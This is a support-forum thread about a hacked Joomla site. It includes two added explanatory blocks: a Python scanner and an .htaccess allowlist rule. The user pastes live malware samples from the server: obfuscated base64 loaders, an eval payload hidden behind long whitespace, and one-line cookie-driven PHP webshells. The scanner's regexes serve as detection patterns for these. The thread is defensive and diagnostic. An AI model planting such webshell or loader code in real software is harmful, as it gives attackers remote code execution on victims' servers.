
#26956 Site web hacked

Posted in ‘Admin Tools for Joomla! 4 & 5’

Environment Information

Joomla! version
n/a
PHP version
n/a
Admin Tools version
n/a

Latest post by on Thursday, 02 March 2017 17:17 CST

cissef
Hi,
Our web site is hacked.
I think the hackers exploited a security hole which exists in Joomla (CVE-2015-8562 - [20151201] - Core - Remote Code Execution Vulnerability) which affects Joomla versions 1.5 to 3.4.5.
We use Joomla 3.3.1. It is difficult for us to upgrade to Joomla 3.4.6 because we modified some Joomla core files to fit our requirements. Now if we upgrade to 3.4.6, that will break the web site.

We've noticed that the hackers modified lots of our Joomla core files and inserted some code. Example:
<?php

if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))

{

define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);



$aqpbpbr = 8553; function pmuvjyckw($hlycrq, $gquzkk){$epicz = ''; for($i=0; $i < strlen($hlycrq); $i++){$epicz .= isset($gquzkk[$hlycr[$i]]) ? $gquzkk[$hlycr[$i]] : $hlycrq[$i];}

$tnfqv="base" . "64_decode";return $tnfqv($epicz);}

$dovbuz = '0yprLIjuMf0hgAIKdcjKfAneMKdkRw5I6wQPxQq70yprLIjuMf0hgAneMojpdXgedXZXC1aQ76kt1i3PlcpUdAIq7'.

'14WOfJUMfJpOvIqLEjrfv8PlE2XC1aQ76kt1i3pdXgedpjKMf3edX'.

...



<?php $GLOBALS['n2bf35138'];global$n2bf35138;$n2bf35138=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['mf55d']="\x4e\x29\x7a\x27\x25\x7d\x4f\x60\x2e\x5d\x75\x56\x58\x76\x31\x5a\x40\x73\x69\x43\x7c\x70\x4b\x6e\x72\x7b\xd\x41\x9\x2f\x3a\x6d\x39\x21\x7e\x57\x2b\x64\x2a\x3f\x4c\x46\x20\x3b\x63\x38\x49\x44\x3d\x36\x67\x28\x3e\x2d\x54\x33\x3c\x30\x71\x48\x34\x24\x51\x5c\x47\x74\x2c\x5e\x32\x45\x77\x66\x78\x22\x26\x50\x42\x53\x6f\x35\x79\x6c\x37\x62\x4a\x6b\xa\x5b\x52\x55\x59\x23\x4d\x65\x6a\x5f\x68\x61";$n2bf35138[$n2bf3513['mf55d'][71]

...



<?php
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJHJyYXh3cHVvID0gMTU5OyBmdW5jdGlvbiB6ZGx5amtlKCRucHdwd25xbiwgJHdmc2pueil7JHhtdHdrZ3lxID0gJyc7IGZvcigkaT0wOyAkaSA8IHN0cmxlbigkbnB3cHducW4pOyAkaSsrKXskeG10d2tneXEgLj0gaXNzZXQoJHd
....


Or sometimes they create lots of files with code like this:
<?php if(isset($_COOKIE["LIg"])){$_COOKIE["sh"]($_COOKIE["LIg"]);exit;}


We've bought Akeeba Admin Tools, activated the WAF and created the .htaccess. We see that it helps to block lots of things, but the hackers can still continue creating and modifying our Joomla files.

- Is there a way to determine which Joomla files have been modified by the hackers?
- Can these kinds of hacks be blocked while we continue to use version 3.3.1?

Actually, it will take us months to upgrade to latest version of Joomla and ensure that the web site will not be broken.

Thank you.

tampe125
Akeeba Staff
Hello,

The CVE you mention is already blocked in Admin Tools 4.0.2; most likely the attack point is different. I think there is another extension that has a remote code execution vulnerability. For example, Kunena had an arbitrary upload issue, and it bypasses Joomla's input API (and therefore Admin Tools can't protect you).
First of all, I'd suggest you upgrade all your components.

Then I'd suggest you take a look at our guide on how to unhack your site: https://www.akeebabackup.com/documentation/walkthroughs/unhacking-your-site.html

Removing the malicious files won't help you; the attacker will always exploit the vulnerability to upload new files.

Davide Tampellini

Developer and Support Staff

🇮🇹Italian: native 🇬🇧English: good • 🕐 My time zone is Europe / Rome (UTC +1)
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!
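The first question in the ticket ("which files did the hackers modify?") is answered most reliably by comparing file hashes against a clean copy of the same release, not by reading code; the samples pasted above also carry markers that a grep-style pass can pick up. The following scanner is an added example written for this thread, not code from the ticket, Joomla, vBulletin or Akeeba. It does both: an integrity check of every file against a baseline manifest, and a signature scan for the exact traits visible in the posted samples (the `ALREADY_RUN_` define guard, `eval(base64_decode(...))`, a `$_COOKIE` value called as a function, the `"base" . "64_decode"` name split, and a long run of whitespace pushing a statement off-screen). All paths and file contents in the demo are constructed. Locally patched core files will show up as modified too, which is the point: the list is for human review. Run it from a clean machine against a copy of the web root; a tool that lives on the compromised host can be edited by whoever already has write access there.

```python
# Added example (not code from the ticket, Joomla, vBulletin or Akeeba).
# Two independent checks for "which files did the attackers touch?":
#  1. integrity: SHA-256 of every file vs. a baseline manifest taken from a
#     clean copy of the same release (or a backup predating the intrusion);
#  2. signatures: regexes for the markers visible in the samples posted in
#     this thread. All paths and file contents below are constructed.
import hashlib
import os
import re
import tempfile

SIGNATURES = {
    # define('ALREADY_RUN_<hex>', 1) guard used by the prepended loader
    "already_run_marker": re.compile(r"ALREADY_RUN_[0-9a-f]{20,}"),
    # eval(base64_decode("...")) one-liner
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    # $_COOKIE["a"]($_COOKIE["b"]): function name and argument both from cookies
    "cookie_callable": re.compile(r"\$_COOKIE\[[^\]]+\]\s*\(\s*\$_COOKIE\["),
    # "base" . "64_decode": function name split to dodge a naive grep
    "split_base64_name": re.compile(r"['\"]base['\"]\s*\.\s*['\"]64_decode['\"]"),
    # 200+ spaces/tabs before a statement, hiding it past the editor's edge
    "whitespace_padding": re.compile(r"[ \t]{200,}\S"),
}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file's path (relative to root, '/'-separated) to its SHA-256."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def integrity_check(root, baseline):
    """Return (modified, unexpected): files whose hash differs from the
    baseline, and files the baseline does not know about. Both sorted."""
    current = build_manifest(root)
    modified = sorted(p for p, h in current.items() if p in baseline and baseline[p] != h)
    unexpected = sorted(p for p in current if p not in baseline)
    return modified, unexpected


def scan_signatures(root, exts=(".php", ".phtml", ".inc")):
    """Map each script matching at least one signature to the signature names
    it matched. Files are read as latin-1 so binary junk inside a webshell
    cannot abort the scan."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as f:
                text = f.read().decode("latin-1")
            matched = [sig for sig, rx in SIGNATURES.items() if rx.search(text)]
            if matched:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = matched
    return hits


def write_files(root, files):
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(content)


def demo():
    """Build a small clean tree, baseline it, then reproduce the three kinds
    of tampering seen in the ticket and return what the two checks report."""
    with tempfile.TemporaryDirectory() as root:
        clean = {
            "index.php": "<?php\ndefine('_JEXEC', 1);\nrequire 'app.php';\n",
            "forum/register.php": "<?php\n// constructed stand-in for vBulletin's register.php\n",
        }
        write_files(root, clean)
        baseline = build_manifest(root)
        infected = {
            # loader prepended to a core file (first sample in the ticket)
            "index.php": (
                "<?php\nif (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))\n{\n"
                "define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);\n"
                "$tnfqv=\"base\" . \"64_decode\";\n}\n"
                "define('_JEXEC', 1);\nrequire 'app.php';\n"
            ),
            # cookie-driven dropper, like 459.php under /forum/
            "forum/459.php": '<?php if(isset($_COOKIE["ikjw"])){$_COOKIE["MHEfB"]($_COOKIE["ikjw"]);exit;}\n',
            # eval(base64_decode()) pushed off-screen with whitespace (third sample)
            "forum/cache.php": "<?php" + " " * 400 + 'eval(base64_decode("aWYgKDEp"));\n',
        }
        write_files(root, infected)
        modified, unexpected = integrity_check(root, baseline)
        return modified, unexpected, scan_signatures(root)


if __name__ == "__main__":
    for label, result in zip(("modified", "unexpected", "signature hits"), demo()):
        print(label, result)
```

On a real site the baseline comes from `build_manifest()` run over an unpacked copy of the exact Joomla and vBulletin release archives, saved once and kept off the server; the cookie-style dropper has no fixed cookie name, so the `cookie_callable` regex matches the shape of the call rather than any particular string, which is why it catches both `459.php` and the earlier `LIg`/`sh` variant from the first post.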

cissef
Hi
Thanks for your help.
Actually, the .htaccess created by the Akeeba Admin Tools blocks all the attacks against all the Joomla folders.
This is a very nice tool.
But the problem I have now is that I have a vBulletin forum which is not protected.
The forum is installed under a folder called 'forum'. So, since the hackers are blocked from accessing the Joomla folders/files, now they create .php files under the /forum/ directory.
Example: 459.php:
<?php if(isset($_COOKIE["ikjw"])){$_COOKIE["MHEfB"]($_COOKIE["ikjw"]);exit;}


How can I restrict access to this forum folder by modifying the .htaccess?
But allow authorized files, I guess files like:
www.mysite.com/forum/
www.mysite.com/forum/register.php

and ban access to any other files under this 'forum' folder?
Thanks !

cissef
I already have a .htaccess file under the /forum/ folder with this:

# Comment the following line (add '#' at the beginning)
# to disable mod_rewrite functions.
# Please note: you still need to disable the hack in
# the vBSEO control panel to stop url rewrites.
RewriteEngine On

# Some servers require the Rewritebase directive to be
# enabled (remove '#' at the beginning to activate)
# Please note: when enabled, you must include the path
# to your root vB folder (i.e. RewriteBase /forums)
RewriteBase /forum/

RewriteCond %{HTTP_HOST} !^www\.mysite\.com
RewriteRule (.*) http://www.mysite.com/forum/$1 [L,R=301]

RewriteRule ^((urllist|sitemap).*\.(xml|txt)(\.gz)?)$ vbseo_sitemap/vbseo_getsitemap.php?sitemap=$1 [L]

RewriteCond %{QUERY_STRING} !vbseourl=
RewriteCond %{REQUEST_URI} !(admincp/|modcp/|chat|cron)
RewriteRule ^(.*\.php)$ vbseo.php?vbseourl=$1 [L,QSA]

RewriteCond %{REQUEST_FILENAME} !\.(jpg|gif)$
RewriteRule ^(archive/.*)$ vbseo.php?vbseourl=$1 [L,QSA]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !^(admincp|modcp|clientscript|cpstyles|images)/
RewriteRule ^(.+)$ vbseo.php?vbseourl=$1 [L,QSA]
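The narrowing asked for in the post can be expressed as a deny-by-default mod_rewrite rule for direct requests to PHP scripts under /forum/. What follows is an added example, not something shipped by vBulletin, vBSEO or Akeeba, and it assumes the allowlist of entry points below; that list is a placeholder, since vBulletin serves users from many scripts (index.php, showthread.php, forumdisplay.php and others) and every script a visitor legitimately requests must be listed or the forum breaks. It should go directly after `RewriteBase /forum/` in the file above and before the vBSEO rules, so it is evaluated against the original request, before the existing `^(.*\.php)$` rule rewrites anything to vbseo.php.

```apache
# Added example: refuse direct requests to any PHP script under /forum/
# that is not on the allowlist. Must precede the vBSEO rewrite rules.
# The allowlist is an assumption; extend it with every script users hit.
RewriteCond %{REQUEST_URI} ^/forum/.*\.(php|phtml|php[0-9])$ [NC]
RewriteCond %{REQUEST_URI} !^/forum/(index|register|login|vbseo)\.php$ [NC]
RewriteRule .* - [F]
```

This only refuses the HTTP request for a dropped file such as 459.php; it does nothing about the write that created it, which is the point Davide makes in his reply. It also leaves a file included from another script, or served under an extension not in the first condition, untouched. For directories that should never execute code at all (attachment and upload folders), disabling the PHP engine for that directory where the host runs mod_php (`php_flag engine off` in that directory's .htaccess) is a more robust control than any allowlist.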

tampe125
Akeeba Staff
The solution is not to stop the connection to the malicious file, wherever it is, but to block the attackers from creating such files.
You should review your site extensions; otherwise they will keep creating files.

Davide Tampellini

System Task
system
This ticket has been automatically closed. All tickets which have been inactive for a long time are automatically closed. If you believe that this ticket was closed in error, please contact us.
